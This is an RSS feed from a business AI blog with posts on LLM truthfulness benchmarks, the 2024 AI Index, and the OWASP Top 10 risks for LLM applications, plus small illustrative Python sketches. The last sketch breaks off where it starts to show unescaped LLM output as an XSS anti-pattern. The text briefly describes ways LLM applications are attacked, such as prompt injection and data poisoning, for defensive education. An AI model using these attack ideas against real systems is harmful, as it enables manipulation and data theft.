<?xml version="1.0" encoding="UTF-8" ?><!-- generator=Zoho Sites --><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><atom:link href="https://www.nownextlater.ai/Insights/tag/ai-risk-management/feed" rel="self" type="application/rss+xml"/><title>Now Next Later AI - Blog #AI Risk Management</title><description>Now Next Later AI - Blog #AI Risk Management</description><link>https://www.nownextlater.ai/Insights/tag/ai-risk-management</link><lastBuildDate>Wed, 26 Nov 2025 21:33:55 +1100</lastBuildDate><generator>http://zoho.com/sites/</generator><item><title><![CDATA[Measuring the Truthfulness of Large Language Models: Benchmarks, Challenges, and Implications for Business Leaders]]></title><link>https://www.nownextlater.ai/Insights/post/Measuring-the-Truthfulness-of-Large-Language-Models</link><description><![CDATA[<img align="left" hspace="5" src="https://www.nownextlater.ai/Screenshot 2024-04-29 at 12.56.35 pm.png"/>LLMs currently face significant challenges when it comes to truthfulness. 
Understanding these limitations is essential for any business considering leveraging LLMs.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_GVCHdVe6Q5O7K4Wm7HPPvg" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_b1wUWYpxS3yvxfwmmwjHMQ" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_n7uk0luTQAe-ggvG9QuZqg" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"] .zpimage-container figure img { width: 500px ; height: 477.31px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"] .zpimage-container figure img { width:500px ; height:477.31px ; } } @media (max-width: 767px) { [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"] .zpimage-container figure img { width:500px ; height:477.31px ; } } [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202024-04-29%20at%2012.56.35%E2%80%AFpm.png" width="500" height="477.31" loading="lazy" size="medium" alt="LLM misinformation" data-lightbox="true"/></picture></span><figcaption class="zpimage-caption zpimage-caption-align-center"><span class="zpimage-caption-content">LLM Misinformation</span></figcaption></figure></div>
</div><div data-element-id="elm_PUyJ5oo1S8KD7u631BYLWA" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_PUyJ5oo1S8KD7u631BYLWA"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div style="color:inherit;text-align:left;"><p>In recent years, large language models (LLMs) like GPT-3, ChatGPT, and others have made stunning breakthroughs in natural language processing. These powerful AI systems can engage in human-like conversations, answer questions, write articles, and even generate code. Their potential to transform industries from customer service to content creation has captured the imagination of business leaders worldwide.</p><p><br></p><p>However, as companies rush to adopt LLMs, a critical question often goes overlooked - just how truthful and reliable are these systems? Can we trust the outputs of LLMs to be factual and free of misinformation or deception? As it turns out, LLMs currently face significant challenges when it comes to truthfulness. Understanding these limitations is essential for any business considering leveraging LLMs.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">The Hallucination Problem&nbsp;</span></p><p><br></p><p>One of the biggest issues with LLMs today is their tendency to &quot;hallucinate&quot; information - that is, to generate content that seems plausible but is not actually true. Because LLMs are trained on vast amounts of online data, they can pick up and parrot back common misconceptions, outdated facts, biases and outright falsehoods mixed in with truth.</p><p><br></p><p>An LLM may confidently assert something that sounds right but does not match reality. For example, an LLM might claim a fictional event from a book or movie actually happened in history. 
Or it may invent realistic-sounding but untrue details when asked about a topic it lacks knowledge of.</p><p><br></p><p>LLMs do not have a true understanding of the information they process - they work by recognizing and reproducing patterns of text. So they can combine ideas in seemingly coherent but inaccurate ways. This makes it difficult to always separate LLM fact from fiction.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Benchmarking LLM Truthfulness&nbsp;</span></p><p><br></p><p>To quantify how prone LLMs are to untruthful outputs, AI researchers have developed benchmark datasets to test these models. Two notable examples are:</p><ol><li><a href="https://arxiv.org/abs/2109.07958" title="TruthfulQA" rel="">TruthfulQA</a> (2022) - Contains 817 questions designed to elicit false answers that mimic human misconceptions across topics like health, law, and finance. Models are scored on how often they generate truthful responses.</li><li><a href="https://arxiv.org/abs/2305.11747" title="HaluEval" rel="">HaluEval</a> (2023) - Includes 35,000 examples of human-annotated or machine-generated &quot;hallucinated&quot; outputs for models to detect, across user queries, Q&amp;A, dialog and summarization. Measures a model's ability to distinguish truthful from untruthful text.</li></ol><p><br></p><p>When tested on these benchmarks, even state-of-the-art LLMs struggle with truthfulness:</p><ul><li>On TruthfulQA, the best model was truthful only 58% of the time (vs 94% for humans). Larger models actually scored worse.</li><li>On HaluEval, models frequently failed to detect hallucinations, with accuracy barely above random chance in some cases. Hallucinated content often covered entities and topics the models lacked knowledge of.</li></ul><p><br></p><p>While providing knowledge or adding reasoning steps helped models somewhat, truthfulness remains an unsolved challenge. 
Models today are not reliable oracles of truth.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Implications for Businesses&nbsp;</span></p><p><br></p><p>The current limitations of LLMs in generating consistently truthful outputs have major implications for their practical use in business:</p><ol><li>Careful human oversight of LLM content is a must. Outputs cannot be blindly trusted as true without verification from authoritative sources.</li><li>LLMs are not suitable for high-stakes domains like healthcare, finance, or legal advice where inaccuracies pose unacceptable risks. More narrow, specialized and validated knowledge bases are needed.</li><li>Using LLMs for content generation requires clear disclosure that output may not be entirely factual. Audiences should be informed about the role and limitations of AI.</li><li>&quot;Prompt engineering&quot; and other filtering techniques to coax more truthful responses have limits. Changes to underlying training data and architectures are needed for major improvements.</li></ol><p><br></p><p>As research continues to progress, we can expect to see more truthful and dependable LLMs over time. Providing models with curated factual knowledge, better reasoning abilities, and alignment with human values are promising directions.</p><p><br></p><p>But for now, business leaders eager to harness the power of LLMs must temper their expectations around truthfulness. Treating these AIs as helpful assistants to augment and accelerate human knowledge work, while keeping a human in the loop to validate outputs, is the prudent approach. The truth is, LLMs still have a ways to go before they can be fully trusted as reliably truthful.</p></div><p></p></div>
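To make the benchmark idea above concrete, here is a deliberately simplified sketch of TruthfulQA-style scoring. Everything in it is an invented stand-in: the questions, the reference answer sets, and the substring matching are illustrative only, while the real benchmark uses 817 curated questions and trained judge models to grade free-form answers.

```python
# Toy TruthfulQA-style scorer (illustrative only, not the real benchmark).
# Each question maps to hand-labeled truthful reference phrases; an answer
# counts as truthful if it contains any of them.

def truthfulness_rate(model_answers, reference):
    """Fraction of model answers matching a known-truthful reference phrase."""
    truthful = 0
    for question, answer in model_answers.items():
        refs = reference[question]["truthful"]
        if any(r.lower() in answer.lower() for r in refs):
            truthful += 1
    return truthful / len(model_answers)

# Hypothetical reference data mimicking common-misconception questions.
reference = {
    "Do we use only 10% of our brains?": {
        "truthful": ["no", "a myth"],
    },
    "Can you see the Great Wall of China from space?": {
        "truthful": ["not with the naked eye"],
    },
}

# Hypothetical model outputs: one truthful answer, one confident falsehood.
model_answers = {
    "Do we use only 10% of our brains?":
        "No, that is a myth; imaging shows activity across the brain.",
    "Can you see the Great Wall of China from space?":
        "Yes, it is clearly visible from orbit.",
}

print(truthfulness_rate(model_answers, reference))  # 0.5 on this toy set
```

Even this toy version shows why human review matters: the model that scores 0.5 here sounds equally confident on both answers.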
</div><div data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"] .zpimage-container figure img { width: 500px ; height: 500.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } @media (max-width: 767px) { [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/introduction-to-large-language-models-for-business-leaders-book" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/12.png" width="500" height="500.00" loading="lazy" size="medium" alt="Intro to LLMs for Business Leaders"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Mon, 29 Apr 2024 13:00:10 +1000</pubDate></item><item><title><![CDATA[The Evolving Landscape of AI Benchmarks: What Business Leaders Need to Know]]></title><link>https://www.nownextlater.ai/Insights/post/the-evolving-landscape-of-ai-benchmarks-what-business-leaders-need-to-know</link><description><![CDATA[In this article, we'll dive into the key findings of the 2024 AI Index Report, focusing on benchmarks for truthfulness, reasoning, and agent-based systems, and explore their implications for businesses.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_d6jrsaerT8Wk036kXfwj6w" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_zymuYnFXQ8SbQQ6USGDgaA" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_iFEqlf-FR9GDCAqyQIMU1A" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"] .zpimage-container figure img { width: 1090px ; height: 414.44px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"] .zpimage-container figure img { width:723px ; height:274.90px ; } } @media (max-width: 767px) { [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"] .zpimage-container figure img { width:415px ; height:157.79px ; } } [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" 
data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202024-04-29%20at%2010.20.30%E2%80%AFam.png" width="415" height="157.79" loading="lazy" size="fit" alt="Truthfulness Benchmarks" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_uGoYnXzASmSIem9JkmLnHQ" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_uGoYnXzASmSIem9JkmLnHQ"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div style="color:inherit;text-align:left;"><div style="color:inherit;"><p>As AI technologies continue to advance at a rapid pace, business leaders must stay informed about the latest trends and developments to make strategic decisions about AI adoption and deployment. The <a href="https://aiindex.stanford.edu/report/" title="2024 AI Index Report" rel="">2024 AI Index Report</a> from the Stanford Institute for Human-Centered Artificial Intelligence (HAI) offers valuable insights into the current state of AI benchmarks, which are standardized tests used to evaluate the performance of AI systems. In this article, we'll dive into the key findings of the report, focusing on benchmarks for truthfulness, reasoning, and agent-based systems, and explore their implications for businesses.</p><p></p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">The Importance of Evolving Benchmarks&nbsp;</span></p><p><br></p><p>AI benchmarks play a crucial role in assessing the capabilities of AI systems and tracking progress over time. However, as AI models become more sophisticated, traditional benchmarks like ImageNet (for image recognition) and SQuAD (for question answering) are becoming less effective at differentiating state-of-the-art systems. This saturation has led researchers to develop more challenging benchmarks that better reflect real-world performance requirements. 
For business leaders, it's essential to understand that relying solely on outdated benchmarks may not provide an accurate picture of an AI solution's true capabilities.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Truthfulness Benchmarks: Ensuring Reliable AI-Generated Content&nbsp;</span></p><p><br></p><p>One of the key concerns for businesses looking to deploy AI solutions is the truthfulness and reliability of AI-generated content. With the rise of powerful language models like GPT-4, the risk of AI systems producing false or misleading information (known as &quot;hallucinations&quot;) has become a significant challenge. Benchmarks like TruthfulQA and HaluEval have been developed to evaluate the factuality of language models and measure their propensity for hallucination.</p><p><br></p><p>TruthfulQA, for example, tests a model's ability to generate truthful answers to questions, while HaluEval assesses the frequency and severity of hallucinations across various tasks like question answering and text summarization. Business leaders should be aware of these benchmarks and consider them when evaluating AI solutions for content generation and decision support, particularly in industries where accuracy is critical, such as healthcare, finance, and legal services.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Reasoning Benchmarks: Assessing AI's Problem-Solving Capabilities&nbsp;</span></p><p><br></p><p>As businesses explore the potential of AI for complex problem-solving and decision-making, understanding the reasoning capabilities of AI systems is crucial. 
The 2024 AI Index Report highlights several new benchmarks designed to test AI's ability to reason across different domains, such as visual reasoning, moral reasoning, and social reasoning.</p><p><br></p><p>One notable example is the MMMU (Massive Multi-discipline Multimodal Understanding and Reasoning Benchmark for Expert AGI), which evaluates AI systems' ability to reason across various academic disciplines using multiple input modalities (e.g., text, images, and tables). Another benchmark, GPQA (Graduate-Level Google-Proof Q&amp;A Benchmark), tests AI's capacity to answer complex, graduate-level questions that cannot be easily found through a Google search.</p><p><br></p><p>While state-of-the-art models like GPT-4 and Gemini Ultra have demonstrated impressive performance on these benchmarks, they still fall short of human-level reasoning in many areas. Business leaders should monitor progress on these benchmarks to better assess the readiness of AI solutions for their specific use cases and understand the limitations of current AI reasoning capabilities.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Agent-Based Systems: Evaluating Autonomous AI Performance</span></p><p><br></p><p>Autonomous AI agents, which can operate independently in specific environments to accomplish goals, have significant potential for businesses across various domains, from customer service to supply chain optimization. The 2024 AI Index Report introduces AgentBench, a new benchmark designed to evaluate the performance of AI agents in interactive settings like web browsing, online shopping, and digital card games.</p><p><br></p><p>AgentBench also compares the performance of agents based on different language models, such as GPT-4 and Claude 2. The report finds that GPT-4-based agents generally outperform their counterparts, but all agents struggle with long-term reasoning, decision-making, and instruction-following. 
For businesses considering deploying AI agents, these findings underscore the importance of thorough testing and the need for human oversight and intervention.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Alignment Techniques: RLHF vs. RLAIF&nbsp;</span></p><p><br></p><p>As businesses deploy AI systems, ensuring that they behave in accordance with human preferences and values is a key concern. Reinforcement Learning from Human Feedback (RLHF) has emerged as a popular technique for aligning AI models with human preferences. RLHF involves training AI systems using human feedback to reward desired behaviors and punish undesired ones.</p><p><br></p><p>However, the 2024 AI Index Report also highlights a new alignment technique called Reinforcement Learning from AI Feedback (RLAIF), which uses feedback from AI models themselves to align other AI systems. Research suggests that RLAIF can be as effective as RLHF while being more resource-efficient, particularly for tasks like generating safe and harmless dialogue. For businesses, the development of more efficient alignment techniques like RLAIF could make it easier and less costly to deploy AI systems that behave in accordance with company values and objectives.</p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;"><br></span></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Emergent Behavior and Self-Correction: Challenging Common Assumptions&nbsp;</span></p><p><br></p><p>The 2024 AI Index Report also features research that challenges two common assumptions about AI systems: the notion of emergent behavior and the ability of language models to self-correct.</p><p><br></p><p>Emergent behavior refers to the idea that AI systems can suddenly develop new capabilities when scaled up to larger sizes. 
However, a study from Stanford suggests that the perceived emergence of new abilities may be more a reflection of the benchmarks used for evaluation than an inherent property of the models themselves. This finding emphasizes the importance of thoroughly testing and validating AI systems before deployment, rather than relying on assumptions about their potential for unexpected improvements.</p><p><br></p><p>Another study highlighted in the report investigates the ability of language models to self-correct their reasoning. While self-correction has been proposed as a solution to the limitations and hallucinations of language models, the research finds that models like GPT-4 struggle to autonomously correct their reasoning without external guidance. This underscores the ongoing need for human oversight and the development of external correction mechanisms.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Techniques for Improving Language Models&nbsp;</span></p><p><br></p><p>As businesses deploy language models for various applications, from customer service to content creation, the efficiency and performance of these models become critical considerations. 
The 2024 AI Index Report showcases several promising techniques for enhancing the performance of language models:</p><ol><li>Graph of Thoughts (GoT) Prompting: A prompting method that enables language models to reason more flexibly by modeling their thoughts in a graph-like structure, leading to improved output quality and reduced computational costs.</li><li>Optimization by PROmpting (OPRO): A technique that uses language models to iteratively generate prompts that improve algorithmic performance on specific tasks.</li><li>QLoRA Fine-Tuning: A fine-tuning method that significantly reduces the memory requirements for adapting large language models to specific tasks, making the process more efficient and accessible.</li><li>Flash-Decoding Optimization: An optimization technique that speeds up the inference process for language models, particularly in tasks requiring long sequences, by parallelizing the loading of keys and values.</li></ol><p><br></p><p>By staying informed about these developments, business leaders can make more strategic decisions about their AI investments and implementations, prioritizing techniques that enhance performance, reduce costs, and align with their specific use cases.</p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;"><br></span></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Conclusion</span></p><p><br></p><p>The 2024 AI Index Report offers valuable insights into the evolving landscape of AI benchmarks and their implications for businesses. As AI systems become more powerful and ubiquitous, it is crucial for business leaders to understand the latest trends in benchmarking, alignment techniques, and performance optimization.</p><p><br></p><p>By monitoring progress on benchmarks for truthfulness, reasoning, and agent-based systems, businesses can better assess the capabilities and limitations of AI solutions and make informed decisions about their adoption and deployment. 
Additionally, staying attuned to developments in alignment techniques like RLAIF and performance optimization methods like GoT prompting and Flash-Decoding can help businesses navigate the complex landscape of AI and harness its potential for growth and innovation.</p><p><br></p><p>Ultimately, the key takeaway for business leaders is the importance of thorough testing, validation, and ongoing monitoring of AI systems. By relying on the latest benchmarks, challenging assumptions about emergent behavior and self-correction, and prioritizing human oversight and external correction mechanisms, businesses can responsibly and effectively leverage AI technologies to drive their success in an increasingly competitive landscape.</p></div></div><p></p></div>
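As a rough illustration of the RLAIF idea discussed above, where AI feedback stands in for human raters, the following sketch labels preference pairs with a stubbed judge. The `ai_judge` heuristic, the sample prompts, and the pair format are all hypothetical; a real pipeline would query a strong LLM with a grading prompt and train a reward model on the resulting (chosen, rejected) pairs.

```python
# Minimal RLAIF-style sketch: an "AI judge" (stubbed here as a keyword
# heuristic) picks the preferred of two candidate responses, producing
# preference pairs of the kind used to train a reward model.

def ai_judge(prompt, response_a, response_b):
    """Stub preference judge: penalize responses with unsafe markers."""
    unsafe_markers = ("UNSAFE", "I made that up")
    score = lambda r: -sum(marker in r for marker in unsafe_markers)
    return "a" if score(response_a) >= score(response_b) else "b"

def build_preference_pairs(samples):
    """Turn (prompt, resp_a, resp_b) triples into chosen/rejected pairs."""
    pairs = []
    for prompt, a, b in samples:
        winner = ai_judge(prompt, a, b)
        chosen, rejected = (a, b) if winner == "a" else (b, a)
        pairs.append({"prompt": prompt, "chosen": chosen, "rejected": rejected})
    return pairs

# Hypothetical training triples.
samples = [
    ("Summarize our refund policy.",
     "Refunds are available within 30 days with a receipt.",
     "Refunds are always granted. I made that up."),
]
pairs = build_preference_pairs(samples)
print(pairs[0]["chosen"])  # the grounded response wins under this stub judge
```

The appeal of RLAIF noted in the report is visible even here: once a judge exists, labeling scales with compute rather than with human annotation hours.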
</div><div data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"] .zpimage-container figure img { width: 800px ; height: 344.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"] .zpimage-container figure img { width:500px ; height:215.00px ; } } @media (max-width: 767px) { [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"] .zpimage-container figure img { width:500px ; height:215.00px ; } } [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-large zpimage-tablet-fallback-large zpimage-mobile-fallback-large "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/aibooks" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Untitled%20design%20-4-.png" width="500" height="215.00" loading="lazy" size="large" alt="Generative AI Books for Business Leaders"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Mon, 29 Apr 2024 10:25:24 +1000</pubDate></item><item><title><![CDATA[The Top 10 Risks Business Leaders Need to Know About Large Language Models]]></title><link>https://www.nownextlater.ai/Insights/post/the-top-10-risks-business-leaders-need-to-know-about-large-language-models</link><description><![CDATA[<img align="left" hspace="5" src="https://www.nownextlater.ai/1697599021768.jpeg"/>Recently, the Open Web Application Security Project (OWASP), a leading authority on cybersecurity, released their list of the Top 10 security risks for LLM applications. Here is what every executive should know about these critical LLM vulnerabilities.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_WSL7nXQ9SwGjiikEeJ1PGQ" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_0oHwNQrTSKeHuGlFD8nbqQ" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_T83VkOeqStSji-4xWuFbtw" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"] .zpimage-container figure img { width: 1090px ; height: 613.13px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"] .zpimage-container figure img { width:723px ; height:406.69px ; } } @media (max-width: 767px) { [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"] .zpimage-container figure img { width:415px ; height:233.44px ; } } [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"].zpelem-image { border-radius:1px; } 
</style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/1697599021768.jpeg" width="415" height="233.44" loading="lazy" size="fit" alt="OWASP Top 10 for LLM Apps" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_GurYT3FqQQCsM7DOfGAsKQ" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_GurYT3FqQQCsM7DOfGAsKQ"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div style="color:inherit;text-align:left;"><p style="font-weight:400;text-indent:0px;">The rapid rise of AI-powered chatbots and large language models like ChatGPT is transforming how businesses operate and engage with customers. These systems, built on large language models (LLMs) trained on massive datasets, offer exciting new capabilities—from generating human-like text to powering interactive virtual assistants. However, as with any powerful new technology, LLMs also introduce new risks that business leaders need to understand and mitigate.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Recently, the Open Web Application Security Project (OWASP), a leading authority on cybersecurity, released their list of the <a href="https://www.llmtop10.com/" title="Top 10 security risks for LLM applications" rel="">Top 10 security risks for LLM applications</a>. Here is what every executive should know about these critical LLM vulnerabilities:</p><p style="font-weight:400;text-indent:0px;"></p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;"><span style="font-family:&quot;Oswald&quot;, sans-serif;font-size:20px;color:rgb(41, 77, 135);">The OWASP Top 10 Risks for LLM Applications</span></p><p style="font-weight:400;text-indent:0px;"></p><div style="color:inherit;"><ol><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Prompt Injection:</span><span style="color:rgb(41, 77, 135);"></span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Attackers can manipulate the LLM to execute unintended actions by &quot;injecting&quot; malicious instructions. 
This could lead to data theft, privilege escalation, and more.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Insecure Output Handling:</span><span style="color:rgb(41, 77, 135);">&nbsp;</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"><span></span>If an application blindly accepts LLM outputs without proper validation, it exposes backend systems to potential exploits like cross-site scripting (XSS) attacks.</span></span></li><li><span><span style="font-size:16px;"><span style="color:rgb(41, 77, 135);">Training Data Poisoning: </span></span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">LLMs are only as good as their training data. Manipulation of training datasets can introduce harmful biases, vulnerabilities, or enable backdoor access.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Model Denial of Service: </span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">Resource-intensive LLM operations triggered by attackers can degrade system performance and drive up computing costs.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Supply Chain Vulnerabilities:</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Compromised data, models, or components anywhere in the complex LLM development lifecycle introduces risks.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Sensitive Information Disclosure: </span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">LLMs may inadvertently reveal confidential data in generated outputs, violating data privacy.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Insecure Plugin Design:</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Extensible LLM plugins 
with poor input validation or access control are easier for attackers to exploit.</span></span></li><li><span><span style="font-size:16px;"><span style="color:rgb(41, 77, 135);">Excessive Agency:</span></span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Granting an LLM too much functionality, autonomy or privilege amplifies the impact of any vulnerabilities.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Overreliance: </span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">Uncritically trusting LLM outputs without human oversight can propagate misinformation, bias, and security issues at scale.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Model Theft:</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Exfiltration of proprietary LLM models is a threat to intellectual property and can enable reverse engineering of sensitive training data.</span></span></li></ol></div><p style="font-weight:400;text-indent:0px;"></p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;"><span style="font-family:&quot;Oswald&quot;, sans-serif;font-size:20px;color:rgb(41, 77, 135);">Key Takeaways for Business Leaders</span></p><p style="font-weight:400;text-indent:0px;"></p><ul><li>Conduct a thorough risk assessment and threat modeling exercise before deploying any LLM application. Understand your organization's specific threat landscape.</li><li>Ensure strong access controls, monitoring, and security safeguards are in place across the entire LLM lifecycle—from initial model training to production deployment.</li><li>Establish clear policies and staff training around responsible LLM use. Humans should remain in the loop for high-stakes decisions.</li><li>Evaluate the security practices of any vendors or third-party LLM components. 
The security of your LLM application is only as strong as its weakest link.</li><li>Keep abreast of this rapidly evolving risk landscape. Follow OWASP and other leading voices in AI security research to stay current on emerging LLM threats and countermeasures.</li></ul><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">The potential of large language models is immense—but so are the risks they pose if not properly understood and mitigated. By taking proactive steps to address the OWASP Top 10 LLM risks, business leaders can harness the power of this transformative technology more securely and strategically. After all, responsible stewardship of AI systems is quickly becoming a core business imperative.</p></div><p></p></div>
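<p style="font-weight:400;text-indent:0px;">Risk #2 above, Insecure Output Handling, is the most concrete to illustrate in code. The following minimal Python sketch is our own illustration, not an OWASP-prescribed implementation: it contrasts interpolating LLM output directly into a page with escaping it first, plus a crude secondary check (real systems would use an allow-list HTML sanitizer rather than a blocklist regex).</p>

```python
import html
import re

def render_unsafe(llm_output: str) -> str:
    # Anti-pattern: LLM output is interpolated directly into HTML.
    # A response containing <script>...</script> executes in the user's browser.
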